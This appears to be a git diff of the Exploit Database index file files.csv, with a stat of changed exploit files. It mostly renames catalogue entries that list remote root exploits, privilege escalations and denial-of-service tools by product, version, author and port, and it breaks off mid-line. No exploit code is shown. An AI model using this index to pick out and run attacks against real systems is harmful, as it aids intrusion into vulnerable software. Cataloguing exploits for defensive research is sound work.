platforms/linux/local/23301.c | 8 +- platforms/linux/local/249.c | 268 +++--- platforms/linux/local/273.c | 16 +- platforms/linux/local/31.pl | 64 +- platforms/linux/local/36747.c | 56 +- platforms/linux/local/40634.py | 58 ++ platforms/linux/local/417.c | 32 +- platforms/linux/local/438.c | 12 +- platforms/linux/remote/13853.pl | 66 +- platforms/linux/remote/16845.rb | 84 +- platforms/linux/remote/16861.rb | 98 +- platforms/linux/remote/16880.rb | 92 +- platforms/linux/remote/23182.c | 148 +-- platforms/linux/remote/23183.c | 212 ++-- platforms/linux/remote/25275.c | 140 +-- platforms/linux/remote/307.py | 70 +- platforms/linux/remote/3389.c | 142 +-- platforms/linux/remote/9952.rb | 80 +- platforms/linux/webapps/10427.txt | 8 +- platforms/multiple/dos/2237.sh | 32 +- platforms/multiple/dos/32208.txt | 180 ++-- platforms/multiple/dos/39165.txt | 6 +- platforms/multiple/dos/6471.pl | 46 +- platforms/multiple/dos/9323.txt | 2 +- platforms/multiple/local/11491.rb | 46 +- platforms/multiple/remote/32791.c | 212 ++-- platforms/multiple/remote/32998.c | 320 +++---- platforms/multiple/webapps/17111.txt | 2 +- platforms/netbsd_x86/local/40385.rb | 178 ++-- platforms/osx/local/20485.sh | 14 +- platforms/osx/remote/16296.rb | 84 +- platforms/osx/remote/16873.rb | 166 ++-- platforms/php/webapps/10324.txt | 22 +- platforms/php/webapps/1078.pl | 70 +- platforms/php/webapps/1083.pl | 46 +- platforms/php/webapps/1084.pl | 14 +- platforms/php/webapps/15237.rb | 66 +- platforms/php/webapps/16882.rb | 84 +- platforms/php/webapps/16894.rb | 90 +- platforms/php/webapps/18208.rb | 70 +- platforms/php/webapps/18230.txt | 12 +- platforms/php/webapps/19403.rb | 138 +-- platforms/php/webapps/19630.rb | 114 +-- platforms/php/webapps/1974.txt | 8 +- platforms/php/webapps/20579.py | 50 +- platforms/php/webapps/24108.txt | 6 +- platforms/php/webapps/28325.txt | 8 - platforms/php/webapps/3007.txt | 32 +- platforms/php/webapps/30449.txt | 2 +- platforms/php/webapps/34189.txt | 20 +- platforms/php/webapps/35336.txt | 22 +- platforms/php/webapps/35338.txt | 2 +- platforms/php/webapps/35543.txt | 118 +-- platforms/php/webapps/36490.py | 78 +- platforms/php/webapps/3729.txt | 16 +- platforms/php/webapps/40637.txt | 40 + platforms/php/webapps/4135.pl | 26 +- platforms/php/webapps/5696.pl | 40 +- platforms/php/webapps/5870.txt | 18 +- platforms/solaris/local/197.c | 116 +-- platforms/solaris/local/20186.c | 110 +-- platforms/solaris/local/20188.c | 70 +- platforms/solaris/local/210.c | 110 +-- platforms/win_x86-64/remote/34334.rb | 226 ++--- platforms/win_x86/local/34167.rb | 156 +-- platforms/windows/dos/10603.c | 112 +-- platforms/windows/dos/16790.rb | 58 +- platforms/windows/dos/23760.pl | 30 +- platforms/windows/dos/23761.c | 38 +- platforms/windows/dos/23762.c | 50 +- platforms/windows/dos/24952.py | 30 +- platforms/windows/dos/26010.py | 10 +- platforms/windows/dos/2855.py | 12 +- platforms/windows/dos/29285.txt | 2 +- platforms/windows/dos/29721.pl | 14 +- platforms/windows/dos/3127.c | 52 +- platforms/windows/dos/3432.pl | 10 +- platforms/windows/dos/3866.html | 24 +- platforms/windows/dos/40635.py | 45 + platforms/windows/dos/40638.py | 43 + platforms/windows/dos/40639.py | 48 + platforms/windows/dos/4289.php | 18 +- platforms/windows/dos/4294.pl | 16 +- platforms/windows/dos/7296.txt | 32 +- platforms/windows/dos/843.c | 26 +- platforms/windows/dos/9881.txt | 24 +- platforms/windows/local/10747.py | 106 +- platforms/windows/local/11079.rb | 82 +- platforms/windows/local/15279.rb | 42 +- platforms/windows/local/15489.py | 92 +- platforms/windows/local/16632.rb | 62 +- platforms/windows/local/16654.rb | 60 +- platforms/windows/local/16661.rb | 58 +- platforms/windows/local/18082.rb | 70 +- platforms/windows/local/19683.c | 46 +- platforms/windows/local/26889.pl | 76 +- platforms/windows/local/2880.c | 98 +- platforms/windows/local/34333.rb | 136 +-- platforms/windows/local/36437.rb | 66 +- platforms/windows/local/36837.rb | 60 +- platforms/windows/local/3757.txt | 48 +- platforms/windows/local/37755.c | 106 +- platforms/windows/local/388.c | 12 +- platforms/windows/local/3888.c | 540 +++++------ platforms/windows/local/40636.txt | 98 ++ platforms/windows/local/559.c | 56 +- platforms/windows/local/863.cpp | 98 +- platforms/windows/remote/10235.py | 82 +- platforms/windows/remote/1223.c | 146 +-- platforms/windows/remote/12614.txt | 2 +- platforms/windows/remote/1448.pl | 80 +- platforms/windows/remote/14519.html | 28 +- platforms/windows/remote/1452.pm | 106 +- platforms/windows/remote/1462.cpp | 126 +-- platforms/windows/remote/149.c | 256 ++--- platforms/windows/remote/157.c | 118 +-- platforms/windows/remote/158.c | 232 ++--- platforms/windows/remote/15809.html | 10 +- platforms/windows/remote/16346.rb | 50 +- platforms/windows/remote/16347.rb | 50 +- platforms/windows/remote/16348.rb | 56 +- platforms/windows/remote/16350.rb | 68 +- platforms/windows/remote/16443.rb | 78 +- platforms/windows/remote/16461.rb | 62 +- platforms/windows/remote/16465.rb | 54 +- platforms/windows/remote/16473.rb | 54 +- platforms/windows/remote/16474.rb | 66 +- platforms/windows/remote/16475.rb | 58 +- platforms/windows/remote/16476.rb | 58 +- platforms/windows/remote/16484.rb | 54 +- platforms/windows/remote/16487.rb | 58 +- platforms/windows/remote/16525.rb | 60 +- platforms/windows/remote/16540.rb | 56 +- platforms/windows/remote/16565.rb | 56 +- platforms/windows/remote/16586.rb | 62 +- platforms/windows/remote/16594.rb | 74 +- platforms/windows/remote/16690.rb | 56 +- platforms/windows/remote/16713.rb | 70 +- platforms/windows/remote/16715.rb | 128 +-- platforms/windows/remote/16733.rb | 52 +- platforms/windows/remote/16752.rb | 72 +- platforms/windows/remote/16770.rb | 92 +- platforms/windows/remote/16787.rb | 76 +- platforms/windows/remote/16798.rb | 68 +- platforms/windows/remote/16808.rb | 54 +- platforms/windows/remote/16818.rb | 74 +- platforms/windows/remote/16821.rb | 52 +- platforms/windows/remote/16824.rb | 54 +- platforms/windows/remote/16970.rb | 62 +- platforms/windows/remote/17355.rb | 58 +- platforms/windows/remote/18190.rb | 66 +- platforms/windows/remote/1885.pl | 116 +-- platforms/windows/remote/2233.c | 104 +- platforms/windows/remote/23591.c | 94 +- platforms/windows/remote/23592.c | 104 +- platforms/windows/remote/23763.c | 352 +++---- platforms/windows/remote/25094.c | 66 +- platforms/windows/remote/27277.py | 56 +- platforms/windows/remote/27703.py | 90 +- platforms/windows/remote/28328.rb | 54 +- platforms/windows/remote/2865.rb | 66 +- platforms/windows/remote/2887.pl | 42 +- platforms/windows/remote/31254.py | 64 +- platforms/windows/remote/31255.py | 64 +- platforms/windows/remote/3132.pl | 54 +- platforms/windows/remote/3140.pl | 42 +- platforms/windows/remote/3170.pm | 88 +- platforms/windows/remote/31789.py | 76 +- platforms/windows/remote/31814.py | 138 +-- platforms/windows/remote/3264.pl | 94 +- platforms/windows/remote/3265.pm | 102 +- platforms/windows/remote/33027.py | 88 +- platforms/windows/remote/3320.pl | 102 +- platforms/windows/remote/33326.py | 48 +- platforms/windows/remote/3388.pl | 76 +- platforms/windows/remote/34059.py | 136 +-- platforms/windows/remote/35055.py | 218 ++--- platforms/windows/remote/3561.pl | 92 +- platforms/windows/remote/36602.html | 98 +- platforms/windows/remote/3680.sh | 108 +-- platforms/windows/remote/39515.rb | 100 +- platforms/windows/remote/3996.c | 182 ++-- platforms/windows/remote/4094.html | 102 +- platforms/windows/remote/4280.pl | 76 +- platforms/windows/remote/4301.cpp | 110 +-- platforms/windows/remote/4316.cpp | 256 ++--- platforms/windows/remote/4334.txt | 6 +- platforms/windows/remote/4715.txt | 2 +- platforms/windows/remote/5315.py | 64 +- platforms/windows/remote/54.c | 236 ++--- platforms/windows/remote/566.pl | 102 +- platforms/windows/remote/598.py | 76 +- platforms/windows/remote/637.c | 84 +- platforms/windows/remote/638.py | 80 +- platforms/windows/remote/643.c | 60 +- platforms/windows/remote/646.c | 78 +- platforms/windows/remote/663.py | 36 +- platforms/windows/remote/668.c | 104 +- platforms/windows/remote/670.c | 138 +-- platforms/windows/remote/819.py | 42 +- platforms/windows/remote/822.c | 146 +-- platforms/windows/remote/9998.c | 30 +- 221 files changed, 9305 insertions(+), 8976 deletions(-) create mode 100755 platforms/linux/local/40634.py delete mode 100755 platforms/php/webapps/28325.txt create mode 100755 platforms/php/webapps/40637.txt create mode 100755 platforms/windows/dos/40635.py create mode 100755 platforms/windows/dos/40638.py create mode 100755 platforms/windows/dos/40639.py create mode 100755 platforms/windows/local/40636.txt diff --git a/files.csv b/files.csv index fc3186237..36fa74c4d 100755 --- a/files.csv +++ b/files.csv @@ -21,15 +21,15 @@ id,file,description,date,author,platform,type,port 20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139 21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0 22,platforms/windows/dos/22.c,"Pi3Web 2.0.1 - Denial of Service (PoC)",2003-04-29,aT4r,windows,dos,0 -23,platforms/windows/remote/23.c,"Real Server < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 +23,platforms/windows/remote/23.c,"RealServer < 8.0.2 - Remote Exploit (Windows Platforms)",2003-04-30,"Johnny Cyberpunk",windows,remote,554 24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 -26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - Remote Users Ident (gossh.sh)",2003-05-02,"Nicolas Couture",linux,remote,0 +26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",linux,remote,0 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0 -31,platforms/linux/local/31.pl,"CdRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0 +31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 @@ -52,7 +52,7 @@ id,file,description,date,author,platform,type,port 51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 -54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 +54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 @@ -102,7 +102,7 @@ id,file,description,date,author,platform,type,port 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Privilege Escalation (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 -105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 +105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308 106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0 107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 @@ -120,7 +120,7 @@ id,file,description,date,author,platform,type,port 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 -124,platforms/windows/remote/124.pl,"IA WebMail 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 +124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (WebServer)",2003-11-22,nesumin,windows,remote,0 @@ -135,7 +135,7 @@ id,file,description,date,author,platform,type,port 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-Nuke 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit",2003-12-27,SpikE,linux,remote,406 -140,platforms/linux/local/140.c,"Xsok 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 +140,platforms/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game Exploit",2004-01-02,c0wboy,linux,local,0 141,platforms/linux/local/141.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (1)",2004-01-06,"Christophe Devine",linux,local,0 142,platforms/linux/local/142.c,"Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Validator (PoC) (2)",2004-01-07,"Christophe Devine",linux,local,0 143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0 @@ -144,15 +144,15 @@ id,file,description,date,author,platform,type,port 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 <= 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows 2003/XP - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 -149,platforms/windows/remote/149.c,"Serv-U FTPD 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21 +149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Command Remote Exploit",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 152,platforms/linux/local/152.c,"rsync 2.5.7 - Local Stack Overflow Privilege Escalation",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) (1)",2004-02-18,"Christophe Devine",linux,local,0 -155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 -156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 -157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow",2004-02-27,"Johnny Cyberpunk",windows,remote,389 -158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow",2004-02-27,Sam,windows,remote,21 +155,platforms/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 +156,platforms/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,windows,remote,8080 +157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow",2004-02-27,"Johnny Cyberpunk",windows,remote,389 +158,platforms/windows/remote/158.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - (MDTM) Remote Overflow",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation (2)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos,0 @@ -171,13 +171,13 @@ id,file,description,date,author,platform,type,port 175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0 176,platforms/windows/dos/176.c,"Microsoft IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 177,platforms/cgi/webapps/177.pl,"Poll It CGI 2.0 - Exploit",2000-11-15,keelis,cgi,webapps,0 -178,platforms/linux/local/178.c,"Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 +178,platforms/linux/local/178.c,"LBL Traceroute - Privilege Escalation",2000-11-15,"Michel Kaempf",linux,local,0 179,platforms/cgi/webapps/179.c,"News Update 1.1 - Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,linux,local,0 181,platforms/linux/remote/181.c,"Half Life - (rcon) Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015 182,platforms/linux/local/182.sh,"Redhat 6.2 /sbin/restore - Exploit",2000-11-16,anonymous,linux,local,0 183,platforms/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,linux,local,0 -184,platforms/linux/local/184.pl,"Perl (Redhat 6.2) - Restore and Dump Local Exploit",2000-11-16,Tlabs,linux,local,0 +184,platforms/linux/local/184.pl,"Redhat 6.2 Restore and Dump - Local Exploit (Perl)",2000-11-16,Tlabs,linux,local,0 185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 186,platforms/linux/local/186.pl,"xsplumber - strcpy() Buffer Overflow",2000-11-17,vade79,linux,local,0 187,platforms/cgi/webapps/187.pl,"ListMail 112 - Command Execution",2000-11-17,teleh0r,cgi,webapps,0 @@ -187,8 +187,8 @@ id,file,description,date,author,platform,type,port 191,platforms/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (7)",2000-11-18,steeLe,windows,remote,80 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 193,platforms/linux/local/193.sh,"dump 0.4b15 - Privilege Escalation",2000-11-19,mat,linux,local,0 -195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 - crontab Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 -197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String",2000-11-20,"Solar Eclipse",solaris,local,0 +195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab - Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 +197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local,0 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 @@ -200,12 +200,12 @@ id,file,description,date,author,platform,type,port 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0 -210,platforms/solaris/local/210.c,"Solaris - locale Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 +210,platforms/solaris/local/210.c,"Solaris locale - Format Strings (noexec stack) Exploit",2000-11-30,warning3,solaris,local,0 211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,hp-ux,dos,0 213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service",2000-12-02,phonix,windows,dos,0 -215,platforms/linux/local/215.c,"glibc - locale bug mount Exploit",2000-12-02,sk8,linux,local,0 +215,platforms/linux/local/215.c,"GLIBC locale - bug mount Exploit",2000-12-02,sk8,linux,local,0 216,platforms/linux/local/216.c,"dislocate 1.3 - Local i386 Exploit",2000-12-02,"Michel Kaempf",linux,local,0 217,platforms/linux/local/217.c,"UUCP Exploit - File Creation/Overwriting (symlinks) Exploit",2000-12-04,t--zen,linux,local,0 218,platforms/linux/local/218.c,"expect (/usr/bin/expect) - Buffer Overflow",2000-12-04,isox,linux,local,0 @@ -217,12 +217,12 @@ id,file,description,date,author,platform,type,port 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515 227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 -229,platforms/linux/local/229.c,"Red Hat 6.2 xsoldier-0.96 - Exploit",2000-12-15,zorgon,linux,local,0 +229,platforms/linux/local/229.c,"Red Hat 6.2 xsoldier 0.96 - Exploit",2000-12-15,zorgon,linux,local,0 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) - Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 -234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7 ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6 / 2.7 - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513 @@ -235,7 +235,7 @@ id,file,description,date,author,platform,type,port 244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow",2001-01-13,"Pablo Sor",solaris,local,0 -249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 +249,platforms/linux/local/249.c,"GLIBC locale - Format Strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux - Exploit",2001-01-15,teleh0r,linux,local,0 @@ -255,10 +255,10 @@ id,file,description,date,author,platform,type,port 266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80 268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80 269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit",2001-05-08,qitest1,linux,remote,21 -270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 +270,platforms/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZip - MIME Parsing Overflow (PoC)",2004-04-15,snooq,windows,local,0 -273,platforms/linux/local/273.c,"SquirrelMail - chpasswd Buffer Overflow",2004-04-20,x314,linux,local,0 +273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 @@ -288,7 +288,7 @@ id,file,description,date,author,platform,type,port 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of 